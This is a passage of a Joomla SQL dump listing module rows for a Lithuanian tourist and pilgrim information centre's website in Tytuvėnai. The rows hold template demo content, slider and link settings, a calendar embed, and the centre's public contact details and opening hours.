00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(88,'Variation 1','Module Variation','<p>Lorem Ipsum is simply dummy text of the printing and <a href=\"#\">typesetting</a> industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley.</p>\r\n<ul>\r\n<li>List Item 1</li>\r\n<li><a href=\"#\">List Item 2</a></li>\r\n<li>List Item 3</li>\r\n</ul>',1,'user-bottom1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\" highlighted\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(89,'Variation 2','','<p>Lorem Ipsum is simply dummy text of the printing and <a href=\"#\">typesetting</a> industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley.</p>\r\n<ul>\r\n<li>List Item 1</li>\r\n<li><a href=\"#\">List Item 2</a></li>\r\n<li>List Item 3</li>\r\n</ul>',1,'user-bottom2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\" green\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(90,'Variation 3','','<ul>\r\n<li><a href=\"#\">List Item 1</a></li>\r\n<li><a href=\"#\">List Item 2</a></li>\r\n<li><a href=\"#\">List Item 3</a></li>\r\n<li><a href=\"#\">List Item 4</a></li>\r\n<li><a href=\"#\">List Item 5</a></li>\r\n<li><a href=\"#\">List Item 6</a></li>\r\n</ul>',1,'user-bottom3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\" gray\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(92,'Variation 4','','<p>Lorem Ipsum is simply dummy text of the printing and <a href=\"#\">typesetting</a> industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley.</p>\r\n<ul>\r\n<li><a href=\"#\">List Item 1</a></li>\r\n<li><a href=\"#\">List Item 2</a></li>\r\n<li><a href=\"#\">List Item 3</a></li>\r\n</ul>',1,'user-bottom1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\" orange\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(93,'Variation 5','','<h3>VARIATION 5</h3>\r\n<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard printing simply. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard printing simply. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard printing simply. Lorem Ipsum is simply dummy text.</p>',1,'user-bottom2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\" maroon\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(94,'Variation 6','','<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.</p>',1,'user-bottom3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\" pink\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(96,'Variation 7','','<h3>VARIATION 7</h3>\r\n<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley.</p>',1,'user-bottom1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\" dark\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(97,'Variation 8','','<h3>VARIATION 8</h3>\r\n<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley.</p>',1,'user-bottom2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\" blue\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(98,'Variation 9','','<h3>VARIATION 9</h3>\r\n<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown.</p>',1,'user-bottom3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\" red\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(101,'Search','','',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_search',1,0,'{\"label\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"1\",\"button_pos\":\"right\",\"imagebutton\":\"\",\"button_text\":\"\",\"opensearch\":\"1\",\"opensearch_title\":\"\",\"set_itemid\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"none\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(200,'Maitinimo meniu','','<p><img src=\"images/Maitinimo logo.jpg\" border=\"0\" alt=\"\" /></p>',4,'account',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(116,'Social','','<div style=\"white-space: nowrap;\"><a href=\"http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/33-kava\"><img src=\"images/kava.jpg\" border=\"0\" title=\"Kava\" width=\"41\" height=\"41\" style=\"margin: 4px;\" /></a><a href=\"index.php/maitinimas\"> </a><a href=\"http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\"><img src=\"images/Maitinimas.jpg\" border=\"0\" alt=\"\" width=\"48\" height=\"48\" /> </a><a href=\"http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/32-dviraciai\"><img src=\"images/dviratis.jpg\" border=\"0\" title=\"Dviračių nuoma\" width=\"41\" height=\"41\" style=\"margin: 4px;\" /></a> <a href=\"index.php/turizmo-informacija\"><img src=\"images/turizmoinformacija.jpg\" border=\"0\" title=\"Informacijos centras\" width=\"31\" height=\"41\" style=\"margin-left: 4px; margin-right: 4px;\" /></a><a href=\"index.php/apgyvendinimas\"><img src=\"images/apgyvendinimas.jpg\" border=\"0\" title=\"Apgyvendinimas\" width=\"40\" height=\"41\" style=\"margin-left: 4px; margin-right: 4px;\" /></a> <a href=\"index.php/lt/?option=com_content&amp;view=article&amp;id=306\"><img src=\"images/popiezius.jpg\" border=\"0\" title=\"Jono Pauliaus II piligrimų kelias\" width=\"40\" height=\"41\" style=\"margin-left: 4px; margin-right: 4px;\" /></a> <a href=\"index.php/lt/?option=com_content&amp;view=article&amp;id=305\"><img src=\"images/2.jpg\" border=\"0\" title=\"Šv. Jokūbo piligrimų kelias\" width=\"41\" height=\"41\" style=\"margin-left: 4px; margin-right: 4px;\" /></a><a href=\"https://www.facebook.com/Tytuvenu.ansamblis/\" target=\"_blank\"><img src=\"images/facebook.jpg\" border=\"0\" title=\"Visit Tytuvenai on Facebook\" width=\"41\" height=\"41\" style=\"margin-left: 4px; margin-right: 4px;\" /></a></div>',3,'account',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(202,'Mobile - Proxy Module','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_mj_proxymodule',1,1,'{\"module_id\":\"201\",\"moduleclass_sfx\":\"\"}',0,'*'),(193,'Renginiai','','',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_googlecalendar',1,1,'{\"code\":\"<iframe src=\\\"http:\\/\\/www.google.com\\/calendar\\/embed?src=renginiai%40tytuvenai.eu&ctz=Europe\\/Vilnius&hl=lt\\\" style=\\\"border: 0\\\" width=\\\"270\\\" height=\\\"300\\\" frameborder=\\\"0\\\" scrolling=\\\"no\\\"><\\/iframe>\"}',0,'*'),(117,'SP Smart Slider','','',1,'slide',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_sp_smart_slider',1,0,'{\"sp_style\":\"university\",\"sliders\":{\"source\":[\"text\",\"text\",\"text\",\"text\",\"text\",\"text\"],\"text\":{\"pretitle\":[\"\",\"\",\"\",\"\",\"\",\"\"],\"title\":[\"Tytuv\\u0117n\\u0173 kult\\u016bros paveldas\",\"Tytuv\\u0117n\\u0173 piligrim\\u0173 centras\",\"Tytuv\\u0117n\\u0173 piligrim\\u0173 centras\",\"Tytuv\\u0117n\\u0173 piligrim\\u0173 centras\",\"Tytuv\\u0117n\\u0173 piligrim\\u0173 centras\",\"Tytuv\\u0117n\\u0173 piligrim\\u0173 centras\"],\"posttitle\":[\"ir jo p\\u0117dsakai istorijoje\",\"\",\"\",\"\",\"\",\"\"],\"link\":[\"https:\\/\\/www.gidas360.lt\\/hmd\\/tytuvenai\\/custom\\/\",\"#\",\"\",\"\",\"\",\"\"],\"readmore\":[\"Virtualus turas\",\"\",\"\",\"\",\"\",\"\"],\"image\":[\"images\\/university\\/slides\\/1aa.jpg\",\"images\\/university\\/slides\\/slide1a.jpg\",\"images\\/university\\/slides\\/slide4.jpg\",\"images\\/university\\/slides\\/slide5.jpg\",\"images\\/university\\/slides\\/slide2.jpg\",\"images\\/university\\/slides\\/slide3.jpg\"],\"thumb\":[\"\",\"images\\/joomla_black.gif\",\"images\\/joomla_black.gif\",\"images\\/joomla_black.gif\",\"images\\/joomla_black.gif\",\"images\\/joomla_black.gif\"],\"introtext\":[\"\",\"Ba\\u017eny\\u010dia, vienuolynas m\\u016bs\\u0173 puo\\u0161mena, kelk auk\\u0161tyn sparnus - atl\\u0117k \\u010dia! \",\"Ba\\u017eny\\u010dia, vienuolynas m\\u016bs\\u0173 puo\\u0161mena, kelk auk\\u0161tyn sparnus - atl\\u0117k \\u010dia!\",\"Ba\\u017eny\\u010dia, vienuolynas m\\u016bs\\u0173 puo\\u0161mena, kelk auk\\u0161tyn sparnus - atl\\u0117k \\u010dia!\",\"Ba\\u017eny\\u010dia, vienuolynas m\\u016bs\\u0173 puo\\u0161mena, kelk auk\\u0161tyn sparnus - atl\\u0117k \\u010dia! \",\"Ba\\u017eny\\u010dia, vienuolynas m\\u016bs\\u0173 puo\\u0161mena, kelk auk\\u0161tyn sparnus - atl\\u0117k \\u010dia! \"],\"content\":[\"\",\"\",\"\",\"\",\"\",\"\"],\"state\":[\"published\",\"published\",\"published\",\"published\",\"published\",\"published\"]}},\"animation\":{\"university\":{\"height\":\"600\",\"tablet_height\":\"400\",\"mobile_height\":\"300\",\"autoplay\":\"1\",\"interval\":\"5000\"}},\"moduleclass_sfx\":\"\",\"module_cache\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(194,'Apgyvendinimas','','<div class=\"map\"><a href=\"index.php/apgyvendinimas\"><img src=\"images/apgyvendinimas_big.jpg\" border=\"0\" width=\"113\" height=\"115\" /></a></div>',1,'right',135,'2024-09-28 08:42:49','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(118,'        Naujienos','Contents on Maintop','<p style=\"text-align: center;\">Sekite naujienas mūsų internetiniame puslapyje <br />arba atvykite pas mus adresu: Maironio g. 2A, Tytuvėnai.</p>',1,'maintop',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-1.jpg\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(196,'sigplus','','',0,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_sigplus',1,1,'',0,'*'),(144,'K2 Quick Icons (admin)','','',0,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_k2_quickicons',1,1,'',1,'*'),(145,'K2 Stats (admin)','','',0,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_k2_stats',1,1,'',1,'*'),(147,'Latest news & analysis','','',1,'user-bottom1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_k2_content',1,1,'{\"moduleclass_sfx\":\"\",\"getTemplate\":\"Default\",\"source\":\"filter\",\"catfilter\":\"1\",\"category_id\":[\"1\"],\"getChildren\":\"0\",\"itemCount\":\"3\",\"itemsOrdering\":\"\",\"FeaturedItems\":\"1\",\"popularityRange\":\"\",\"videosOnly\":\"0\",\"item\":\"0\",\"itemTitle\":\"1\",\"itemAuthor\":\"0\",\"itemAuthorAvatar\":\"0\",\"itemAuthorAvatarWidthSelect\":\"custom\",\"itemAuthorAvatarWidth\":\"50\",\"userDescription\":\"0\",\"itemIntroText\":\"0\",\"itemIntroTextWordLimit\":\"\",\"itemImage\":\"0\",\"itemImgSize\":\"Small\",\"itemVideo\":\"0\",\"itemVideoCaption\":\"0\",\"itemVideoCredits\":\"0\",\"itemAttachments\":\"0\",\"itemTags\":\"0\",\"itemCategory\":\"0\",\"itemDateCreated\":\"1\",\"itemHits\":\"0\",\"itemReadMore\":\"0\",\"itemExtraFields\":\"0\",\"itemCommentsCounter\":\"0\",\"feed\":\"0\",\"itemPreText\":\"\",\"itemCustomLink\":\"0\",\"itemCustomLinkTitle\":\"\",\"itemCustomLinkURL\":\"http:\\/\\/\",\"itemCustomLinkMenuItem\":\"\",\"K2Plugins\":\"1\",\"JPlugins\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(148,'Upcoming events','','',1,'user-bottom2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_k2_content',1,1,'{\"moduleclass_sfx\":\"\",\"getTemplate\":\"Event\",\"source\":\"filter\",\"catfilter\":\"1\",\"category_id\":[\"2\"],\"getChildren\":\"0\",\"itemCount\":\"3\",\"itemsOrdering\":\"\",\"FeaturedItems\":\"1\",\"popularityRange\":\"\",\"videosOnly\":\"0\",\"item\":\"0\",\"itemTitle\":\"0\",\"itemAuthor\":\"0\",\"itemAuthorAvatar\":\"0\",\"itemAuthorAvatarWidthSelect\":\"custom\",\"itemAuthorAvatarWidth\":\"50\",\"userDescription\":\"0\",\"itemIntroText\":\"1\",\"itemIntroTextWordLimit\":\"12\",\"itemImage\":\"1\",\"itemImgSize\":\"Small\",\"itemVideo\":\"1\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemAttachments\":\"1\",\"itemTags\":\"0\",\"itemCategory\":\"0\",\"itemDateCreated\":\"1\",\"itemHits\":\"0\",\"itemReadMore\":\"0\",\"itemExtraFields\":\"0\",\"itemCommentsCounter\":\"0\",\"feed\":\"0\",\"itemPreText\":\"\",\"itemCustomLink\":\"0\",\"itemCustomLinkTitle\":\"\",\"itemCustomLinkURL\":\"http:\\/\\/\",\"itemCustomLinkMenuItem\":\"\",\"K2Plugins\":\"1\",\"JPlugins\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(149,'User-bottom3','','<p><img src=\"images/university/user-bottom3_ad.png\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"btn btn-primary btn-block support\"><a href=\"#\">Support the Campaign for the University</a></p>\r\n<p class=\"apply\"><a href=\"#\">Apply Online</a></p>',1,'user-bottom3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(150,'University History','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<br />Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.</p>',1,'mainbottom',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/main-bottom-bg.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(151,'Menu Promotion','','<p><img src=\"images/university/menu-promotion.png\" border=\"0\" alt=\"\" /></p>\r\n<p><a class=\"btn btn-primary btn-block\" href=\"#\">Download Tuition Rate Schedule</a></p>\r\n<p><a class=\"btn btn-primary btn-block\" href=\"#\">Download Prospectus</a></p>',1,'menu-promotion',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(152,'Adresas','','<p><span style=\"font-size: medium;\">Maironio g. 2a, 86486 Tytuvėnai</span></p>\r\n<p><span style=\"font-size: medium;\">Mob. tel. +370672 44199 (direktorė)</span></p>\r\n<p><span style=\"font-size: medium;\">Mob. tel. +370 675 58506 <br />(užsakymų priėmimas)</span></p>\r\n<p style=\"font-size: 12.16px;\"><span style=\"font-size: medium;\"><a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></span></p>\r\n<div><span style=\"font-size: medium;\"><strong>Darbo valandos</strong></span></div>\r\n<div><span style=\"font-size: medium;\">I-V 8:00-17:00</span></div>\r\n<div><span style=\"font-size: medium;\">VI  9<span>:00-18:00</span><span><br /></span></span></div>\r\n<div><span style=\"font-size: medium;\">VII 10<span>:00-15:00</span></span></div>\r\n<div><span style=\"font-size: medium;\">Pietų pertrauka 12:00 - 12:45</span></div>\r\n<div><span style=\"font-size: medium;\"> </span></div>\r\n<div><span style=\"font-size: medium;\"><img src=\"images/stories/kelme/kelme.jpg\" border=\"0\" alt=\"\" /></span></div>',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(153,'Žemėlapis','','<div class=\"map\">[spmap lat=\"55.596489\" lng=\"23.20066\" zoom=\"16\" height=\"400\" maptype=\"ROADMAP\"]</div>',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(155,'Features','','',1,'feature',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_news_show_sp2',1,1,'{\"uniqid\":\"\",\"content_source\":\"joomla\",\"catids\":[\"13\"],\"vmcat\":\"all\",\"vmordering\":\"latest\",\"ordering\":\"a.created\",\"ordering_direction\":\"ASC\",\"user_id\":\"0\",\"show_featured\":\"\",\"article_column\":\"3\",\"article_row\":\"1\",\"article_col_padding\":\"20px\",\"article_showtitle\":\"1\",\"article_linkedtitle\":\"1\",\"article_title_text_limit\":\"1\",\"article_count_title_text\":\"0\",\"article_introtext\":\"1\",\"article_intro_text_limit\":\"0\",\"article_count_intro_text\":\"10\",\"article_date_format\":\"0\",\"article_show_author\":\"0\",\"article_show_category\":\"0\",\"article_linked_category\":\"1\",\"article_show_ratings\":\"0\",\"article_show_image\":\"1\",\"article_linked_image\":\"1\",\"article_image_pos\":\"top\",\"article_image_float\":\"float:none\",\"article_image_margin\":\"0 0 20px 0\",\"article_thumb_width\":\"100\",\"article_thumb_height\":\"100\",\"article_thumb_ratio\":\"0\",\"article_extra_fields\":\"0\",\"article_show_more\":\"1\",\"article_more_text\":\"Skaityti daugiau\",\"article_comments\":\"0\",\"article_hits\":\"0\",\"btn_like\":\"0\",\"btn_twitter\":\"0\",\"btn_gplus\":\"0\",\"art_show_price\":\"0\",\"art_show_cart_button\":\"0\",\"article_animation\":\"cover-horizontal-push\",\"article_slide_count\":\"3\",\"article_controllers_style\":\"nssp2-default\",\"article_pagination\":\"0\",\"article_arrows\":\"0\",\"article_autoplay\":\"0\",\"article_play_button\":\"0\",\"article_activator\":\"click\",\"article_animation_speed\":\"300\",\"article_animation_interval\":\"5000\",\"article_animation_transition\":\"linear\",\"links_block\":\"0\",\"links_count\":\"3\",\"links_col_padding\":\"3px 3px 3px 3px\",\"links_position\":\"bottom\",\"links_more\":\"1\",\"links_more_text\":\"Skaityti daugiau\",\"links_title_text_limit\":\"1\",\"links_title_count\":\"0\",\"links_show_intro\":\"0\",\"links_intro_text_limit\":\"0\",\"links_intro_count\":\"20\",\"links_show_image\":\"0\",\"links_linked_image\":\"1\",\"links_image_pos\":\"bottom\",\"links_image_float\":\"float:left\",\"links_image_margin\":\"0 0 0 0\",\"links_thumb_width\":\"50\",\"links_thumb_height\":\"50\",\"links_thumb_ratio\":\"0\",\"links_show_price\":\"0\",\"links_show_cart_button\":\"0\",\"links_animation\":\"cover-horizontal-push\",\"links_slide_count\":\"2\",\"links_controllers_style\":\"nssp2-default\",\"links_pagination\":\"0\",\"links_arrows\":\"0\",\"links_autoplay\":\"0\",\"links_play_button\":\"0\",\"links_activator\":\"click\",\"links_animation_speed\":\"300\",\"links_animation_interval\":\"5000\",\"links_animation_transition\":\"linear\",\"layout\":\"tytuvenu_piligrimu_centras:scroller\",\"custom_js\":\"1\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(179,'University Gallery','','',1,'gallery-page',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_sp_portfolio',1,0,'{\"catid\":\"14\",\"limit\":\"20\",\"column\":\"4\",\"ajaxlimit\":\"2\",\"orderby\":\"a.created\",\"ordering\":\"DESC\",\"show_featured\":\"\",\"module_layout\":\"appico\",\"show_title\":\"0\",\"linked_title\":\"0\",\"show_category\":\"0\",\"show_url\":\"1\",\"show_introtext\":\"0\",\"show_readmore\":\"0\",\"ajax_loader\":\"0\",\"show_filter\":\"1\",\"load_jquery\":\"1\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(171,'gallery','','<div class=\"gallery-content\">\r\n<h1><a href=\"index.php?option=com_content&amp;view=article&amp;id=66&amp;catid=14&amp;Itemid=218\">University in Pictures</a></h1>\r\n<a href=\"index.php?option=com_content&amp;view=article&amp;id=66&amp;catid=14&amp;Itemid=218\">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </a></div>',1,'gallery',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/gallery.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(159,'Our Founders','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.</p>\r\n<p>Consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.</p>\r\n<p> </p>\r\n<p><img src=\"images/university/founders.jpg\" border=\"0\" alt=\"\" /></p>',1,'bottom1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(161,'Login','','',1,'account',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_login',1,0,'{\"pretext\":\"\",\"posttext\":\"\",\"login\":\"\",\"logout\":\"\",\"greeting\":\"1\",\"name\":\"0\",\"usesecure\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(166,'Ads','','<p><img src=\"images/university/event-course-ad.jpg\" border=\"0\" alt=\"\" /></p>',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(178,'Banner Shortcode','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-1.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(167,'Comments','','',10,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 